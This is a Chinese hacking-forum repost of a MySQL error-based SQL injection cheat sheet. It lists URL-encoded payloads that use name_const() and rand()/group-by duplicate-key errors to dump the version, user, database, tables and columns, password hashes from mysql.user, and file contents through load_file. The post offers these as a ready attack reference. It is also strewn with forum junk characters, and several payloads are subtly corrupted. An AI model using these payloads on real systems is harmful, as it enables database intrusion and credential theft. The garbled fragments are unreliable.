Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
( R) `% B4 a* E& V$ o. S5 \5 Z" D
2 B2 {+ @4 E; ]) i% O
1 C) R. G, z% ~2 SMysql暴错注入参考（pdf），每天一贴。。。

MySql Error Based Injection Reference
[Mysql暴错注入参考]
) A4 n+ k% P# {7 _7 _5 K9 x5 L" L) IAuthornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
- Y- j! u8 `. ]$ y$ |Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
2 ?* V5 n' i; x* e1 b, U0 u- Fup by a)b)
查询当前用户:
  c- U0 I: H  d1 k2 S& p6 TMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
. U1 x8 |8 J+ P9 x查询当前数据库:
5 L) k- R9 p5 S1 C; Z5 eMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
) _' [) O5 l5 Z- ]Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
. |" q3 ]7 H5 d7 d依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
2 J/ ^9 J; z1 a4 Z' x. s" t顺序替换
3 I) Q$ \6 X( N( p; y' |7 _  e& m爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
# U9 D; ?5 j5 d6 g$ ^able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
. S, `- y' f/ s. [% ~able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
) H# X& C& C1 D/ D6 r8 z3 q4 Lbles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
6 }6 t7 `; I: |5 A' v' D& x0 _+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
; c* R7 h/ D0 H/ d1 O* f0 Q3 Tand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
  u- [$ r' m* i5 p6 Z& B) k依次暴内容:
6 @: @; j; V& m- U5 Nand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
" b' z2 ?7 y! C  U) Z+ @' r- Rand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
$ k; T% ?3 F7 B+ a9 W0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

8 S  P5 o5 r& _" K8 S4 X/ f不要下载也可以，
- y" x! g/ }' u8 B! m- c2 I